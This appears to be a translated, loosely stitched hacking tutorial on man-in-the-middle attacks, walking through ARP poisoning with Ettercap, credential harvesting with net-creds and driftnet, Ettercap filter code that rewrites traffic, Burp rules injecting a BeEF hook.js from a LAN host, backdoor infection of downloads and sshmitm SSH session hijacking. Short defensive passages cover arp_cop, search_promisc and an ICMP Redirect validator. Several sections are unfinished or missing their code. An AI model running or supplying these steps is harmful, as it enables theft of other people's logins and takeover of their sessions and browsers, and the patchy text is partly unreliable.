Hackers use it to redirect traffic. Methods of hacker attacks. Data spoofing with Burp

Methods for intercepting network traffic

Eavesdropping on the network with a network analyzer (sniffer) is the first and simplest way to intercept data.

To protect against network eavesdropping, use special programs, for example, AntiSniff, which are capable of identifying computers on the network that are listening to network traffic.

Anti-sniffer programs rely on a tell-tale sign of a listening device on the network: the sniffing computer's network card must be in a special listening (promiscuous) mode. While in listening mode, computers on the network react in a special way to IP datagrams sent to the host being tested. For example, listening hosts typically process all incoming traffic, not just datagrams addressed to the host itself. There are other signs of suspicious host behavior that AntiSniff can recognize.

Undoubtedly, eavesdropping is very useful from the point of view of an attacker, since it allows one to obtain a lot of useful information - passwords transmitted over the network, addresses of network computers, confidential data, letters, etc. However, simple eavesdropping does not allow a hacker to interfere with network communication between two hosts in order to modify and corrupt data. To solve such a problem, more complex technology is required.

To intercept and take over the process of network interaction between two hosts A and B, an attacker can replace the IP addresses of interacting hosts with his own IP address by sending falsified ARP (Address Resolution Protocol) messages to hosts A and B.

Fig. 1 False ARP requests

Let's see how a hacker can use ARP to intercept network communications between hosts A and B.

To intercept network traffic between hosts A and B, the hacker imposes his IP address on these hosts, so that A and B use this falsified IP address when exchanging messages. To impose his IP address, the hacker performs the following operations.

  • The attacker determines the MAC addresses of hosts A and B, for example, using the nbtstat command from the W2RK package.
  • The attacker sends messages to the identified MAC addresses of hosts A and B, which are falsified ARP responses to requests for resolving the hosts' IP addresses to the MAC addresses of computers. Host A is informed that the IP address of host B corresponds to the MAC address of the attacker’s computer; host B is informed that the IP address of host A also corresponds to the MAC address of the attacker’s computer.
  • Hosts A and B store the received MAC addresses in their ARP caches and then use them to send messages to each other. Since IP addresses A and B correspond to the MAC address of the attacker’s computer, hosts A and B, unsuspectingly, communicate through an intermediary who can do anything with their messages.

To protect against such attacks, network administrators must maintain a database with a table of correspondence between the MAC addresses and IP addresses of their network computers.

On UNIX networks, this kind of spoofed-ARP attack can be carried out with system utilities for monitoring and managing network traffic, for example arpredirect. Unfortunately, equally reliable utilities do not seem to exist for Windows networks. For example, the NTsecurity website offers the GrabItAll utility, presented as a tool for redirecting traffic between network hosts; however, a basic check of GrabItAll's functionality shows that it is still far from fully implementing what it promises.

To intercept network traffic, an attacker can substitute his own IP address for the real IP address of a network router, for example by using falsified ICMP Redirect messages. According to RFC 1122, host A must treat a received Redirect message as a response to a datagram it sent to another host, for example B. Host A decides what to do based on the contents of the Redirect, and if the Redirect specifies that datagrams from A to B are to be sent along a new route, that is exactly what host A will do.

Fig. 2 False routing

To perform false routing, the attacker must know some details about the organization of the local network in which host A is located, in particular the IP address of the router through which traffic from host A to B is sent. Knowing this, the attacker generates an IP datagram whose sender IP address is set to the router's IP address and whose recipient is host A. The datagram carries an ICMP Redirect message with the new-router address field set to the IP address of the attacker's computer. Having received such a message, host A will send all its messages to the IP address of the attacker's computer.

To protect against such an attack, disable (for example, with a firewall) the processing of ICMP Redirect messages on host A; the tracert command (traceroute on Unix) can reveal the IP address of the attacker's computer. These utilities can find an additional route that has appeared on the local network and was not planned when it was set up, provided, of course, that the network administrator is vigilant.
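As an added illustration (not code from the original article), here is the RFC 1122 acceptance check a host applies to an ICMP Redirect, run against a constructed Redirect of the kind described above; all addresses are constructed, with 192.168.1.35 standing in for the attacker's machine. It shows why the recommended defence is to disable Redirect processing outright: the forged message passes every RFC check, because its source is spoofed as the router and the "new gateway" is on the local segment.

```python
import ipaddress
import struct
from typing import Tuple

# Constructed addresses for this example: host A, the router it currently
# uses as first hop, and the directly connected subnet.
HOST_A = ipaddress.IPv4Address("192.168.1.33")
ROUTER = ipaddress.IPv4Address("192.168.1.1")
LOCAL_NET = ipaddress.IPv4Network("192.168.1.0/24")
ICMP_REDIRECT = 5          # ICMP type 5 = Redirect
REDIRECT_FOR_HOST = 1      # code 1 = redirect datagrams for the host


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum as used by ICMP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_redirect(src: str, target: str, new_gw: str) -> bytes:
    """Construct an IPv4 datagram carrying an ICMP Redirect (test data only).

    src is the IP the sender claims (the router's, in the attack from the
    text), target is host A, new_gw the address A is told to route through.
    The ICMP payload is the header plus 8 bytes of the datagram being
    redirected (host A -> 8.8.8.8 here), as RFC 1122 requires.
    """
    orig = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 0, 0, 64, 6, 0,
                       ipaddress.IPv4Address(target).packed,
                       ipaddress.IPv4Address("8.8.8.8").packed) + b"\x00" * 8
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, REDIRECT_FOR_HOST, 0,
                       ipaddress.IPv4Address(new_gw).packed) + orig
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64,
                         1, 0, ipaddress.IPv4Address(src).packed,
                         ipaddress.IPv4Address(target).packed)
    return ip_hdr + icmp


def validate_redirect(pkt: bytes, accept_redirects: bool = True) -> Tuple[bool, str]:
    """Decide whether host A should act on a received ICMP Redirect.

    Applies the RFC 1122 (section 3.2.2.2) acceptance rules: the message must
    come from the gateway A currently uses, must refer to a datagram A itself
    sent, the new gateway must be on a directly connected network, and the
    ICMP checksum must verify. accept_redirects=False models the mitigation
    from the text (Redirect processing disabled on the host or by a firewall).
    """
    if not accept_redirects:
        return False, "redirect processing disabled"
    if len(pkt) < 20 or pkt[9] != 1:
        return False, "not an IPv4/ICMP packet"
    ihl = (pkt[0] & 0x0F) * 4
    src = ipaddress.IPv4Address(pkt[12:16])
    icmp = pkt[ihl:]
    if len(icmp) < 8 + 28:
        return False, "truncated ICMP message"
    if checksum(icmp) != 0:
        return False, "bad ICMP checksum"
    if icmp[0] != ICMP_REDIRECT:
        return False, "not a Redirect"
    new_gw = ipaddress.IPv4Address(icmp[4:8])
    # Source address of the quoted original datagram sits 12 bytes into its header.
    orig_src = ipaddress.IPv4Address(icmp[8 + 12:8 + 16])
    if orig_src != HOST_A:
        return False, "refers to a datagram we did not send"
    if src != ROUTER:
        return False, f"sent by {src}, not by current gateway {ROUTER}"
    if new_gw not in LOCAL_NET:
        return False, f"new gateway {new_gw} is not directly connected"
    return True, f"accepted: route via {new_gw}"


if __name__ == "__main__":
    # The spoofed Redirect from the text: source forged as the router,
    # new gateway = another machine on the LAN (constructed as 192.168.1.35).
    spoofed = build_redirect("192.168.1.1", "192.168.1.33", "192.168.1.35")
    print(validate_redirect(spoofed))                          # passes the RFC checks
    print(validate_redirect(spoofed, accept_redirects=False))  # stopped only by the mitigation
    print(validate_redirect(build_redirect("192.168.1.77", "192.168.1.33", "192.168.1.35")))
```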

The above examples of interceptions (to which the capabilities of attackers are far from limited) convince us of the need to protect data transmitted over the network if the data contains confidential information. The only method of protection against interceptions of network traffic is the use of programs that implement cryptographic algorithms and encryption protocols and prevent the disclosure and substitution of secret information. To solve such problems, cryptography provides the means to encrypt, sign, and verify the authenticity of messages transmitted over secure protocols.

Practical implementation of all cryptographic methods for protecting information exchange is provided by VPNs (Virtual Private Networks).

TCP connection interception

The most sophisticated network traffic interception attack is TCP connection hijacking: the hacker interrupts the current communication session with the host by generating and sending TCP packets to the attacked host, then uses TCP's ability to restore an interrupted connection to take over the interrupted session and continue it in place of the disconnected client.

Several effective utilities have been created to perform TCP connection hijacking attacks, but all of them are implemented for the Unix platform, and on Web sites these utilities are presented only in source code form. Thus, TCP connection hijacking attacks are of little use.

TCP (Transmission Control Protocol) is one of the basic protocols of the OSI transport layer, allowing logical connections to be established over a virtual communication channel. Over this channel packets are transmitted and received with their sequence tracked, the flow of packets is controlled, retransmission of corrupted packets is organized, and at the end of the session the channel is torn down. TCP is the only basic protocol of the TCP/IP family that has an advanced message identification and connection system.

Overview of software packet sniffers

All software sniffers can be divided into two categories: sniffers launched from the command line and sniffers with a graphical interface, although some sniffers combine both. Sniffers also differ in the protocols they support, the depth of analysis of intercepted packets, the ability to configure filters, and compatibility with other programs.

Usually the window of a sniffer with a graphical interface consists of three areas. The first displays summary data for intercepted packets. Typically this area shows a minimum of fields, namely: the time of packet interception; the IP addresses of the packet's sender and recipient; the MAC addresses of the sender and recipient, source and destination port numbers; the protocol type (network, transport or application layer); and some summary information about the intercepted data. The second area displays statistical information about the selected packet, and the third displays the packet in hexadecimal or ASCII form.

Almost all packet sniffers allow you to analyze decoded packets (which is why packet sniffers are also called packet analyzers or protocol analyzers). The sniffer sorts intercepted packets by layer and protocol. Some packet sniffers can recognize the protocol and display the captured information; this information is usually shown in the second area of the sniffer window. For example, any sniffer can recognize TCP, and advanced sniffers can determine which application generated the traffic. Most protocol analyzers recognize over 500 different protocols and can describe and decode them by name. The more information a sniffer can decode and display on screen, the less has to be decoded manually.

One problem packet sniffers may encounter is the inability to correctly identify a protocol that uses a port other than its default. For example, to improve security, some well-known applications may be configured to use non-default ports: instead of the traditional port 80 reserved for the web server, the server can be reconfigured to port 8088 or any other. In this situation some packet analyzers cannot correctly determine the protocol and display only information about the lower-level protocol (TCP or UDP).

There are software sniffers that come with software analytical modules as plugins or built-in modules that allow you to create reports with useful analytical information about intercepted traffic.

Another characteristic feature of most software packet analyzers is the ability to configure filters before and after traffic is captured. Filters select certain packets from the general traffic according to a given criterion, which allows you to get rid of unnecessary information when analyzing traffic.

Alternatives to Ettercap

Ettercap is the most popular man-in-the-middle attack software, but is it the best? Throughout this guide you will see that Ettercap is almost never used alone; some other program is always chained with it to process traffic. Perhaps this adds flexibility; in general this approach is the basis of UNIX: one program performs one task, and the end user combines various programs to achieve the desired result. With this approach program code is easier to maintain, and from such miniature “bricks” you can build a system of any complexity and flexibility. However, having five open consoles with different tasks, all of whose programs are aimed at one single result, is not very convenient; it is simply more complicated, there is a chance of making a mistake at some stage, and then the entire configured system will work in vain.

Net-Creds sniffs:

  • Visited URLs
  • POST requests sent
  • logins/passwords from HTTP forms
  • logins/passwords for basic HTTP authentication
  • HTTP lookups
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 over all supported protocols (HTTP, SMB, LDAP, etc.)
  • Kerberos

A good selection of intercepted data; driftnet is simpler in this regard: it only shows intercepted images.

Switch your machine to forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward

Launch Ettercap with a graphical interface (-G):

ettercap -G

Now open the Hosts menu, which has a Scan for hosts item. After the scan is complete, select Hosts list:

As Target1, select the router (Add to Target 1), as Target2 select the device you will attack (Add to Target 2).

But here the first hitch may arise, especially if there are many hosts. In various guides, including the video presented above, the authors go to the target machine (which for some reason is always Windows) and run a command on it to look up its IP on the local network. You will agree that this option is unacceptable in real conditions.

If you scan with nmap, you can get some additional information about the hosts, more precisely about the network card manufacturer:

nmap -sn 192.168.1.0/24

If the data is still not enough, then you can do a scan to determine the OS:

nmap -O 192.168.1.0/24

As we can see, the machine with IP 192.168.1.33 turned out to be Windows, if this is not a sign from above, then what is it? 😉 LOL

This is what we add as Target 2.

Now go to the Mitm menu. There, select ARP poisoning... and check the Sniff remote connections box.

We begin harvesting. In one window launch:

net-creds

and in another (both programs can be run without options):

driftnet

Data collection began immediately:

On the right side, driftnet has opened another window in which it shows the intercepted images. In the net-creds window we see visited sites and intercepted passwords:

1.2 Ettercap + Burp Suite
3. View data (sites visited and captured passwords) in Ettercap

In the View menu we have access to the Connections and Profiles tabs. You can also check the Resolve IP addresses box. Connections are, of course, connections. Ettercap collects profiles in memory for each host it discovers; users and passwords are collected there. Profiles with captured account data (passwords) are marked with a cross:

There is no need to rely too much on profiles: only intercepted logins and passwords for FTP and other services where the program can unambiguously interpret the received data as credentials are marked. This does not include, for example, basic authentication data or logins and passwords entered into web forms.

In Connections, the most promising data is marked with an asterisk:

You can double-click on these entries to view details:

In order not to search for these stars throughout the list, you can sort by this field and they will all appear at the top or bottom:

Caught Basic Authentication:

Login-password for Yandex (highlighted below):

These are the intercepted credentials for VKontakte:

Also, the most interesting data is collected in the lower console:

If you want to save the program's results, use these options (specify the keys when starting Ettercap):

Logging options:
  -w, --write <file>          write captured data to pcapfile <file>
  -L, --log <logfile>         write all traffic to this <logfile>
  -l, --log-info <logfile>    write only passive information to this <logfile>
  -m, --log-msg <logfile>     write all messages in this <logfile>
  -c, --compress              use gzip compression for log files

4. On-the-fly data substitution in Ettercap
4.1 Using Ettercap Custom Filters

Note: Despite all the testing, the Ettercap filters still did not work for me. It is hard to tell whether it is my own fault, hardware quirks, or a bug in the program itself... But for version 0.8.2 (the latest at the moment) there is a bug report about problems with filters. In general, judging by bug reports and forums, filters either break often or have not worked at all for a long time. There is a branch where changes were made 5 months ago, https://github.com/Ettercap/ettercap/tree/filter-improvements, i.e. filter-improvements. Both this branch and the version from the repository were tested extensively, various filters were tried under different conditions, a lot of time was spent, but there was no result. By the way, to install the filter-improvements version in Kali Linux you need to do this:

sudo apt-get remove ettercap-graphical ettercap-common
sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev
git clone -b filter-improvements https://github.com/Ettercap/ettercap.git
cd ettercap/
mkdir build
cd build
cmake -DENABLE_PDF_DOCS=On ../
make
sudo make install

In general, if your filters do not work, you are not alone. In a guide about Ettercap I cannot skip the topic of filters, so they will be discussed in any case.

So far we have used Ettercap for ARP spoofing, which is a very superficial application. Thanks to custom filters we can intervene and change traffic on the fly. Filters must be kept in separate files and compiled with the etterfilter program before use. Although the documentation seems scant, coupled with the examples below it will let you write quite interesting filters.

Let's create our first filter, it will replace all images with this:

In a file named img_replacer.filter copy:

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: the replacement string is the same length as the original
        msg("zapped Accept-Encoding!\n");
    }
}

if (ip.proto == TCP && tcp.src == 80) {
    replace("src=", " src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    replace("SRC=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    replace("SRC =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    msg("Filter Ran.\n");
}

Compile the file:

etterfilter img_replacer.filter -o img_replacer.ef

Compilation results:

etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team

 14 protocol tables loaded:
	DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth

 13 constants loaded:
	VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP

 Parsing source file "img_replacer.filter"  done.

 Unfolding the meta-tree  done.

 Converting labels to real offsets  done.

 Writing output to "img_replacer.ef"  done.

 -> Script encoded into 18 instructions.

The -F switch tells the program to load the filter from the file that follows the switch. After compilation, the name of our new file with the filter is img_replacer.ef, so the command takes the form:

ettercap -G -F img_replacer.ef

Note: When you monitor web traffic, the packets you see may be in encrypted form. For filters to work effectively, Ettercap needs the traffic as plain text. According to some observations, the encoding that web pages use is "Accept-Encoding: gzip, deflate".

Below is a filter that overwrites the encoding, forcing communication in the form of plain text:

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "gzip")) {
        replace("gzip", "    "); # note: four spaces in the replacement string
        msg("whited out gzip\n");
    }
}

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "deflate")) {
        replace("deflate", "       "); # note: seven spaces in the replacement string
        msg("whited out deflate\n");
    }
}

The filter syntax is described in detail in the documentation; here are a few more examples:

# replacing text in a packet
if (ip.proto == TCP && search(DATA.data, "lol")) {
    replace("lol", "smh");
    msg("filter ran");
}

# show a message if the tcp port is 22
if (ip.proto == TCP) {
    if (tcp.src == 22 || tcp.dst == 22) {
        msg("SSH packet\n");
    }
}

# log all telnet traffic, and also execute ./program for each packet
if (ip.proto == TCP) {
    if (tcp.src == 23 || tcp.dst == 23) {
        log(DATA.data, "./logfile.log");
        exec("./program");
    }
}

# log all traffic except http
if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
    log(DATA.data, "./logfile.log");
}

# some operations on the packet payload
if (DATA.data + 20 == 0x4142) {
    DATA.data + 20 = 0x4243;
} else {
    DATA.data = "modified";
    DATA.data + 20 = 0x4445;
}

# drop all packets containing "ettercap"
if (search(DECODED.data, "ettercap")) {
    msg("some one is talking about us...\n");
    drop();
    kill();
}

# log decrypted ssh packets matching the regular expression
if (ip.proto == TCP) {
    if (tcp.src == 22 || tcp.dst == 22) {
        if (regex(DECODED.data, ".*login.*")) {
            log(DECODED.data, "./decrypted_log");
        }
    }
}

# dying packets
if (ip.ttl < 5) {
    msg("The packet will die soon\n");
}

# the same for IPv6, but with a trivial test first to make sure these really are IPv6 packets
if (eth.proto == IP6 && ipv6.hl < 5) {
    msg("The IPv6 packet will die soon\n");
}

# string comparison at a given offset
if (DATA.data + 40 == "ette") {
    log(DATA.data, "./logfile");
}

# inject a file after the specified packet
if (tcp.src == 21 && search(DATA.data, "root")) {
    inject("./fake_response");
}

# replace the whole packet with another one
if (tcp.src == 23 && search(DATA.data, "microsoft")) {
    drop();
    inject("./fake_telnet");
}

# modify binary data using an external program
if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) {
    log(DATA.data, "/tmp/payload");
    drop();
    execinject("/bin/sed 's/\x03com\x00/\x02my\x04page\x02de\x00/g' /tmp/payload");
    udp.len += 7;
    exec("/bin/rm /tmp/payload");
    msg("faked");
}

# filter only the specified IP address
if (ip.src == "192.168.0.2") {
    drop();
}

# do the same for IPv6
if (ipv6.src == "2001:db8::1") {
    drop();
}

# combine IPv4 and IPv6
if (eth.proto == IP && ip.dst == "192.168.0.2") {
    msg("drop IPv4");
    drop();
}
if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") {
    msg("drop IPv6");
    drop();
}

# translate tcp packets from port 80 to 81
if (tcp.dst == 80) {
    tcp.dst -= 1;
    tcp.dst += 2;
}

# find and mangle ESP packets
if (ip.proto == ESP) {
    DATA.data = "DEADDECAF";
}

4.2 Data substitution using Burp

We launch Ettercap and Burp as described in paragraph 1.2 or in paragraph 2.2.

In Burp, go to Proxy -> Options. We find Match and Replace there. Click Add to add a new rule.

  • Request header is the request header
  • Request body - request body
  • Response header - response header
  • Response body - response body
  • Request param name - Request parameter name
  • Request param value - Request parameter value
  • Request first line - First line of the request

If you need to change the data transmitted by the GET method, then this applies to headers.

In HTML markup there is also the head tag. The headers mentioned above have nothing to do with it: there we were talking about packet headers. If you want to change the content of HTML pages, you should always select Response body instead of Request header, even if you are going to change the contents of the head tag (for example, the title).

If you are not familiar with regular expressions, then, in principle, there’s nothing to worry about: HTML forgives a lot, and what it doesn’t understand, it simply ignores - you can use it. If you know how to use regular expressions, then I respect you.)))

For example, let's create a new rule, changing Request header to Response body. In the rule itself we will change

.*

No Title

Check the Regex match box.

Now on all sites (without HTTPS) the title will be No Title:

Insert an arbitrary line after the body tag (it will be the first line in the text). Request header is changed to Response body. We change

Check the Regex match box.

In the upper right corner (depending on the layout) the inscription “I am cool!” appears. You can insert CSS, JavaScript code, any text - anything. You can generally remove everything from the page, and then fill it with your own content - it all depends on your imagination.

The idea was to slightly modify each form so that the data would be sent to the original server and to the attacker’s server (implement multi-submit for each form). But having reasoned that if the transmitted data is not encrypted and we have access to it, then we already see it, there is no need to send it to any server. However, if someone needs a really working example of sending data from one form to several servers at once.

5. Hookup on BeEF

To start using the capabilities of BeEF, we need to embed a JavaScript file in the HTML code, usually a line like:

The next two methods differ only in the method of embedding this string.

5.1 Hooking up BeEF using Ettercap filters

[section to be prepared later]

5.2 Hooking up BeEF with Burp

You need to start exactly as written in paragraph 4.2. Only instead of replacing headers and adding text to the site, we will inject JavaScript code in the form of a line:

In my case this file is available at IP 192.168.1.36 on port 3000. The file is called hook.js (this can be changed in the settings). That is, in my case I need to inject the line:

This can be done, for example, by creating a new rule, changing Request header to Response body. The replacement must occur in the HTML code itself:

Great, when you open any website that does not have HTTPS, JavaScript code is inserted into the HTML code, which allows you to collect information through a hooked browser and carry out various attacks:

6. Infection with backdoors

You can replace and infect executable files using both Ettercap filters [which for some reason no longer work] and using third party applications. For example, BDFProxy can do this on the fly. Unfortunately, BDFProxy is still reeling from the April 2016 Backdoor Factory update: the libmproxy package was renamed mitmproxy in Python. For BDFProxy, the libmproxy package is a necessary dependency; without this package the program will not start. Therefore, now, before the “repair” of BDFProxy, it is impossible to use it, because even with Backdoor Factory installed, the BDFProxy program complains about the absence of the libmproxy library...

A similar operation can be done with Burp Suite. The step-by-step procedure has already been presented; there is no point in repeating it in this section.

7. Using Ettercap plugins

Information about Ettercap plugins can be found in the Ettercap documentation. There are quite a lot of plugins; the ones described below seem to me the most interesting.

Plugins can be loaded when Ettercap is launched; there is an option for this:

  -P, --plugin <plugin>    run this plugin

Plugins can also be loaded from the GUI:

[MATERIAL UNDER PREPARATION]

7.1 arp_cop

It reports suspicious ARP activity by passively monitoring ARP requests/responses. It can report ARP poisoning attempts or simple IP conflicts or IP changes. If you are building an initial list of hosts, the plugin will work more accurately.

ettercap -TQP arp_cop //

An example of real detection of ARP spoofing:


mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop //
password for mial:

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:
  eth0 -> 08:00:27:A3:08:4A
	  192.168.1.36/255.255.255.0
	  fe80::a00:27ff:fea3:84a/64

SSL dissection needs a valid "redir_command_on" script in the etter.conf file
Privileges dropped to EUID 65534 EGID 65534...

  33 plugins
  42 protocol dissectors
  57 ports monitored
20530 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

3 hosts added to the hosts list...
Starting Unified sniffing...

Text only Interface activated...
Hit "h" for inline help

Activating arp_cop plugin...

arp_cop: plugin running...
arp_cop: (new host) 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
arp_cop: (WARNING) 192.168.1.35 pretends to be 192.168.1.1
...

7.2 autoadd

It automatically adds new victims to the ARP poisoning mitm attack as they come up. It looks for ARP requests on the LAN and, when one is detected, adds the host to the list of victims if it matches the specified TARGET. The host is added when an ARP request from it is seen.

7.3 chk_poison

It checks whether Ettercap's ARP poisoning modules were successful. It sends spoofed ICMP echo packets to all poisoned victims while pretending to be each of the other victims. If it catches an ICMP reply with our MAC address as the destination, the poisoning between the two targets is successful. It checks both directions of each connection.

7.4 dns_spoof

This plugin intercepts DNS requests and responds with a spoofed (fake) reply. You can choose which address the plugin should answer with by editing the etter.dns file. The plugin intercepts A, AAAA, PTR, MX, WINS, SRV and TXT requests. If it is an A request, the name is looked up in the file and the IP address is returned (you can use wildcards in the name).

The same applies to AAAA requests.

7.5 find_conn

A very simple plugin that listens for ARP requests to show you all the targets that the host wants to communicate with. It can also help you find addresses on unknown LANs.

ettercap -TQzP find_conn
ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Tries to identify ettercap packets sent on the LAN. It can be useful for spotting someone who is trying to use ettercap. Do not rely on it 100%, since the checks only work on specific sequence/ID numbers.

7.7 scan_poisoner

Checks whether anyone is poisoning between any host in the list and us. First it checks whether two hosts in the list have the same MAC address; that may mean one of them is poisoning us by pretending to be the other. It can generate many false positives in a proxy-ARP environment. You must build the host list before this check can run. After that it sends ICMP echo packets to each host in the list and checks whether the source MAC of the reply differs from the one stored in the list for that IP; that may mean someone is poisoning that host by pretending to have our IP address and forwarding the intercepted packets to us. This active test cannot be run in unoffensive mode.

ettercap -TQP scan_poisoner //

7.8 search_promisc

Tries to find out whether anyone is sniffing in promiscuous mode. It sends two different malformed ARP requests to each target in the host list and waits for replies. If a reply comes back from a target, that target more or less probably has its NIC in promiscuous mode: a card in normal mode would have discarded a frame that is not addressed to it, so only a card passing every frame up to the IP stack can answer. It may generate false alarms. You can run it from the command line or from the plugins menu. Since it listens for ARP replies, do not run it while you are sending ARP requests yourself.

ettercap -TQP search_promisc /192.168.0.1/
ettercap -TQP search_promisc //

An example run. Note what the plugin actually reports: two hosts are classified as "less probably" sniffing and none as "most probably", so the result is a hint to follow up, not proof of a sniffer:

root@HackWare:~# ettercap -TQP search_promisc

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:
  eth0 -> 08:00:27:AF:30:B9
          192.168.1.35/255.255.255.0
          fe80::a00:27ff:feaf:30b9/64

SSL dissection needs a valid "redir_command_on" script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 65534 EGID 65534...

  33 plugins
  42 protocol dissectors
  57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

5 hosts added to the hosts list...
Starting Unified sniffing...

Text only Interface activated...
Hit "h" for inline help

Activating search_promisc plugin...
search_promisc: Searching promisc NICs...
Less probably sniffing NICs:
- 192.168.1.36
- 192.168.1.34
Most probably sniffing NICs:
- NONE

Closing text interface...
Terminating ettercap...
Lua cleanup complete!
Unified sniffing was stopped.

7.9 sslstrip

During an SSL mitm attack, ettercap replaces the real SSL certificate with its own. The fake certificate is created on the fly, and all its fields are filled in according to the real certificate presented by the server. The forged certificate is not signed by a CA the client trusts, so a browser shows a certificate warning; the attack succeeds only when the user clicks through it or when the client does no verification at all.

In this article we will look at Man-in-the-Middle attacks, or rather at redirecting SSH and HTTP traffic with a Man-in-the-Middle attack. Let's not beat around the bush and get down to business.

Man in the Middle (MitM for short, or simply "the man-in-the-middle attack") is a type of attack based on redirecting the traffic between two machines in order to intercept information and then study, destroy or modify it. So, the first thing we need is the dsniff package (you will find a link to the package at the end of the article). Why? Because this package contains all the utilities we need, including sshmitm (redirecting SSH traffic) and webmitm (redirecting HTTP traffic), which get around the following security scheme. As you know, protocols with data encryption are fairly "secure" (encryption helps :)) and do not allow attacks to be carried out "on top of" the network layer: the encryption key is unknown to the attacker, so he can neither decrypt the data nor insert a command. Everything seems fine, and yet the MitM programs from the dsniff package (sshmitm and webmitm) get around this protection (almost anything can be gotten around). They all work on the same principle: the intermediate host receives the client's request while "telling" the client that it is the server, and then itself connects to the real server. The client therefore negotiates its encryption with the attacker, not with the server, and the attacker sees everything in the clear.

The second thing we need is competent hands; the most important thing is desire and, of course, a victim, that is, the computer we are going to attack.

Redirecting SSH traffic

Having prepared the tools, you now understand what is what and why :). Take sshmitm: we will redirect SSH traffic with it (anything you did not understand in the theoretical part, read above), taking advantage of the weak point of today's key infrastructure: SSH host keys are not certified by anyone, so the client cannot tell a changed or unknown host key from a genuine one unless it has seen the key before, and many users accept it anyway. Two practical limits of the tool: sshmitm handles only SSH protocol version 1, and it only sees sessions that have been redirected to it, for example with dnsspoof or arpspoof from the same package. Let's look at the syntax of sshmitm:

sshmitm [-d] [-I] [-p port] host [port]

-d
enable debugging output (i.e. a more verbose mode)

-I
session hijacking (monitor and hijack interactive sessions)

-p port
port to listen on

host
address of the remote host whose sessions will be intercepted

port
port on the remote host

Everything seems simple and tasteful, nothing complicated :). Let's start carrying out the attack!

# sshmitm server.target.gov    // specify your SSH server
sshmitm: relaying to server server.target.gov

Since we do not have the real SSH host key, the attacked user's client will run its host key check; it will look something like this:

clientmachine$ ssh server.target.gov
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
Please contact your system administrator.

Then the user decides whether to connect or not. If yes, we get full control over the SSH session. (A client configured with StrictHostKeyChecking=yes refuses the changed key outright and never asks.) BUT! If the user has never connected to that machine before, the following message may be displayed instead:

The authenticity of host "server.target.gov" can't be established.
RSA key fingerprint is bla:bla:bla;bla;bla........
Are you sure you want to continue connecting (yes/no)?

Here too the user has two choices, to connect or not. If yes, we have intercepted the session; if not, then alas... :(. In short, the attack succeeds if the user connects, and sshmitm in turn records all the logins and passwords, in a very readable form :). Naturally this is not the only SSH session interceptor, but once you are familiar with this one you can easily master another :)

Redirecting HTTP traffic

